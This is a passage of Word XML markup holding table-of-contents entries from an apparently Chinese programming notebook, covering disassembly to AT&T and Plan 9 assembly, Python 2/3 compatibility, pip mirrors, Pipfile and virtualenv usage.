        <w:p w14:paraId="1E7D4BD4" w14:textId="1E48A784" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779841" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>反汇编成</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>AT&amp;T</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>汇编</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779841 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>401</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="47D2CB7F" w14:textId="006DA961" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779842" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>反汇编成</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Plan 9</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>汇编</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779842 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>401</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="7CD5ABE9" w14:textId="7783A1A1" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779843" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Pyhton</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779843 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>402</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2C31159D" w14:textId="062F295A" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779844" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>区分</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Py2</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>和</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Py3</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779844 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>402</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="7216E732" w14:textId="2EB248F6" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779845" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>方法</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>：</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>sys.version</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779845 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>402</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="73B06E16" w14:textId="29E86416" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779846" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>方法</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>：</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>six</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>区分</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779846 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>402</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="527C24D2" w14:textId="1E6AFD1D" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779847" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>如何兼容</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>py2</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>和</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>py3</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779847 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>402</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="7F9D7C9A" w14:textId="563E712F" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779848" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>pip</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779848 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>403</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="57C22ADC" w14:textId="2BCAA852" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779849" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>pip</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>换源</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779849 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>403</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4EF33122" w14:textId="64D399D4" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779850" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>更新</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779850 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>403</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="62B0BED0" w14:textId="4F854686" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779851" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>pipfile</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>：虚拟环境</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779851 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>404</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="31952D1F" w14:textId="04C68FB1" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779852" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>virtualenv</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>：包环境</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779852 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>404</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="42F0C5E5" w14:textId="33EA2E09" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779853" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>安装</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779853 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>404</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="29E4AE8C" w14:textId="52A15856" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779854" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>创建存储</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>py</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>的环境</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779854 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>405</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4508E7DB" w14:textId="2540A109" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779855" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>激活</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>venv</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779855 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>405</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="01B3A2D7" w14:textId="520B917B" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779856" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>关闭激活</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779856 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>405</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="637AC342" w14:textId="319B492C" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
